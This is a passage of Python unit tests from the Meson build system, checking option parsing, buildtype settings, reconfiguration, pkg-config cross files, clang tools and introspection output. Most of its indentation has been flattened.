Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
            # Static libraries are not linkable with -l with msvc because meson
            # installs them as .a files, which unix_args_to_native does not
            # recognize since it expects libraries to use the .lib extension.
            # For a DLL the import library is installed as .lib. Thus for msvc
            # this test needs to use shared libraries to exercise the path
            # resolving logic in the dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
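        # For each libdir flag style: build and install the library, configure
        # a consumer that only finds it via LDFLAGS, then change the exported
        # symbols and verify that the consumer executable is rebuilt.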
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
            # assert that the user of the library will be rebuilt
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
            # restore dirs for the next test case
            self.installdir = initial_installdir
            self.builddir = initial_builddir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
        # It is not an error to set a wrong option for unknown subprojects or
        # languages because we don't have control over which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
        # Setting the same option a 2nd time should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
            # Ignore KeyError, it happens on CI for compilers that do not
            # support b_sanitize. We have to test with a base option because
            # they used to fail this test with Meson 0.46 and earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
                with open(mfile, 'w') as of:
                    of.write("project('foobar', 'c')\n")
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
        # Setting optimization to 3 should cause buildtype
        # to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
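        # The cross file written below points [binaries] pkgconfig at the
        # test's cross_pkgconfig.py wrapper for host-machine lookups, while
        # PKG_CONFIG_LIBDIR steers native lookups to the bundled
        # native_pkgconfig directory.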
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = [r'{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
        # Rewrite the version stored in coredata: with change_minor=True only
        # the last version component is bumped, otherwise an old version
        # (0.47.0) is written to force a reconfigure from scratch.
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
        # Path() is not a chdir context manager; cd into the build directory so
        # the wipe really runs from inside it, then restore the previous cwd.
        prev_dir = os.getcwd()
        os.chdir(self.builddir)
        try:
            self.init(testdir, extra_args=['--wipe'])
        finally:
            os.chdir(prev_dir)
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
        # This id is stable but not guessable.
        # The test is supposed to prevent unintentional
        # changes to target ID generation.
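        # Expected IDs have the form '<short hash of the subdir path>@@<target name><suffix>'.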
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
        # Do a build to generate a cross file that describes the current machine as its host
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
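        # Local helper: every (key, expected_type) pair must be present in obj
        # with a value of that type.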
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
